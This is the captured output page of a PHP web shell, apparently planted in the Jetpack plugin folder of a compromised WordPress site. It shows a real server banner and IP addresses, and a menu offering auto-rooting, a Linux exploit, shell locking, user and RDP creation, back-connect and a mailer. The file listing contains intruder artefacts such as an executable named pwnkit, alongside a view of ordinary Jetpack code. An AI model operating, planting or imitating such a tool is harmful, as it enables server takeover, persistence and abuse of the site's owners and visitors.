Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
773.27
KB
-rw-r--r--
LICENSE.txt
18.2
KB
-rw-r--r--
SECURITY.md
2.45
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-jetpack-connection-statu...
728
B
-rw-r--r--
class-jetpack-gallery-settings...
3.47
KB
-rw-r--r--
class-jetpack-newsletter-dashb...
436
B
-rw-r--r--
class-jetpack-pre-connection-j...
2.34
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
7.46
KB
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
7.38
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
21.28
KB
-rw-r--r--
class.jetpack-autoupdate.php
9.93
KB
-rw-r--r--
class.jetpack-cli.php
74.32
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.62
KB
-rw-r--r--
class.jetpack-gutenberg.php
45.32
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.44
KB
-rw-r--r--
class.jetpack-modules-list-tab...
14.81
KB
-rw-r--r--
class.jetpack-network-sites-li...
6.03
KB
-rw-r--r--
class.jetpack-network.php
22.19
KB
-rw-r--r--
class.jetpack-plan.php
4.09
KB
-rw-r--r--
class.jetpack-post-images.php
11.72
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
5.69
KB
-rw-r--r--
class.jetpack-user-agent.php
25.3
KB
-rw-r--r--
class.jetpack.php
205.12
KB
-rw-r--r--
class.json-api-endpoints.php
91.64
KB
-rw-r--r--
class.json-api.php
38.3
KB
-rw-r--r--
class.photon.php
1.74
KB
-rw-r--r--
composer.json
4.29
KB
-rw-r--r--
enhanced-open-graph.php
4.71
KB
-rw-r--r--
functions.compat.php
4.34
KB
-rw-r--r--
functions.cookies.php
2.04
KB
-rw-r--r--
functions.global.php
15.87
KB
-rw-r--r--
functions.is-mobile.php
2.47
KB
-rw-r--r--
functions.opengraph.php
30.99
KB
-rw-r--r--
functions.photon.php
3.04
KB
-rw-r--r--
jetpack.php
8.92
KB
-rw-r--r--
json-api-config.php
338
B
-rw-r--r--
json-endpoints.php
6.92
KB
-rw-r--r--
load-jetpack.php
3.69
KB
-rw-r--r--
locales.php
371
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
33.65
KB
-rw-r--r--
unauth-file-upload.php
5.85
KB
-rw-r--r--
uninstall.php
1.65
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : unauth-file-upload.php
<?php /** * Unauthenticated File Upload Helper Functions. * * @package automattic/jetpack */ namespace Automattic\Jetpack\UnauthFileUpload; if ( ! defined( 'ABSPATH' ) ) { exit( 0 ); } add_action( 'wp_ajax_jetpack_unauth_file_download', __NAMESPACE__ . '\handle_file_download' ); add_filter( 'jetpack_unauth_file_upload_get_file', __NAMESPACE__ . '\get_file_content', 10, 2 ); add_filter( 'jetpack_unauth_file_download_url', __NAMESPACE__ . '\filter_get_download_url', 10, 2 ); /** * Get the file download URL filter callback. * * @param string $url The file download URL. * @param int $file_id The file ID. * * @return string The file download URL. */ function filter_get_download_url( $url, $file_id ) { $nonce = wp_create_nonce( 'jetpack_unauth_file_download_nonce_' . $file_id ); return add_query_arg( array( 'action' => 'jetpack_unauth_file_download', 'file_id' => $file_id, '_wpnonce' => $nonce, ), admin_url( 'admin-ajax.php' ) ); } /** * Handle file download requests from the admin page. * * @return never This method never returns as it exits directly */ function handle_file_download() { if ( ! current_user_can( 'edit_pages' ) ) { wp_die( esc_html__( 'Sorry, you are not allowed to access this page.', 'jetpack' ) ); } $file_id = isset( $_GET['file_id'] ) ? absint( wp_unslash( $_GET['file_id'] ) ) : 0; if ( ! $file_id ) { wp_die( esc_html__( 'Invalid file request.', 'jetpack' ) ); } if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ), 'jetpack_unauth_file_download_nonce_' . $file_id ) ) { wp_die( esc_html__( 'Invalid nonce.', 'jetpack' ) ); } /** * Get the file content that we send to the user to download. * * @since 14.6 * * @param array $file_content The file content. * @param string $file_id The file ID. * * @return array|\WP_Error The file array, containing the content, name and type. */ $file = apply_filters( 'jetpack_unauth_file_upload_get_file', array(), $file_id ); if ( is_wp_error( $file ) || empty( $file ) || ! is_array( $file ) ) { wp_die( esc_html__( 'Error retrieving file content.', 'jetpack' ) ); } // Given $file can be manipulated by a filter, make sure everything is as it should be. $file['content'] = $file['content'] ?? ''; $file['type'] = $file['type'] ?? 'application/octet-stream'; $file['name'] = $file['name'] ?? ''; $is_preview = isset( $_GET['preview'] ) && 'true' === $_GET['preview'] && is_file_type_previewable( $file['type'] ); // Clean output buffer if ( ob_get_length() ) { ob_clean(); } // Set headers for download header( 'Content-Type: ' . $file['type'] ); if ( ! $is_preview ) { // Forcing the file to be downloaded is important to prevent XSS attacks. header( 'Content-Disposition: attachment; filename="' . sanitize_file_name( $file['name'] ) . '"' ); } else { // For preview mode, use inline disposition header( 'Content-Disposition: inline; filename="' . sanitize_file_name( $file['name'] ) . '"' ); } header( 'Content-Length: ' . strlen( $file['content'] ) ); header( 'Content-Transfer-Encoding: binary' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); header( 'Pragma: no-cache' ); header( 'Expires: 0' ); // Output file content and exit echo $file['content']; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Binary file data exit( 0 ); } /** * Get the file content. * * @param array $file_content The file content, name and type. * @param integer $file_id The file ID. * @return array|\WP_Error The file content, name and type */ function get_file_content( $file_content, $file_id ) { if ( ( new \Automattic\Jetpack\Status\Host() )->is_wpcom_simple() ) { return $file_content; } $blog_id = \Jetpack_Options::get_option( 'id' ); $request_url = sprintf( '/sites/%d/unauth-file-upload/%s', $blog_id, $file_id ); $response = \Automattic\Jetpack\Connection\Client::wpcom_json_api_request_as_blog( $request_url, 'v2', array( 'method' => 'GET', ), null, 'wpcom' ); $file_content = wp_remote_retrieve_body( $response ); if ( is_wp_error( $response ) || empty( $file_content ) ) { return new \WP_Error( 'jetpack_unauth_file_upload_error', esc_html__( 'Error retrieving file content.', 'jetpack' ) ); } try { $content = json_decode( $file_content, true, 3, defined( 'JSON_THROW_ON_ERROR' ) ? \JSON_THROW_ON_ERROR : 0 ); // phpcs:ignore PHPCompatibility.Constants.NewConstants.json_throw_on_errorFound if ( isset( $content['message'] ) ) { return new \WP_Error( 'jetpack_unauth_file_upload_error', esc_html__( 'Error retrieving file content.', 'jetpack' ) ); } } catch ( \Exception $e ) { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement.DetectedCatch // If the file is not JSON, we assume it's a binary file. } $content_disposition = wp_remote_retrieve_header( $response, 'content-disposition' ); $filename = ''; if ( $content_disposition ) { // Match the filename using a regular expression if ( preg_match( '/filename="([^"]+)"/', $content_disposition, $matches ) ) { $filename = $matches[1]; // Extract the filename } } $type = wp_remote_retrieve_header( $response, 'content-type' ); if ( empty( $type ) ) { $type = 'application/octet-stream'; // Default to binary if no content type is found } return array( 'content' => $file_content, 'type' => $type, 'name' => $filename, ); } /** * Check which file type is previewable in the browser without downloading them. * * Allow images with extensions jpg, jpeg, png, gif, webp and pdf files. * * @param string $file_type The MIME type of the file. * @return bool True if the file is previable, false otherwise. */ function is_file_type_previewable( $file_type ) { $previable_types = array( 'image/jpeg', 'image/png', 'image/gif', 'image/webp', 'application/pdf', ); return in_array( $file_type, $previable_types, true ); }
Close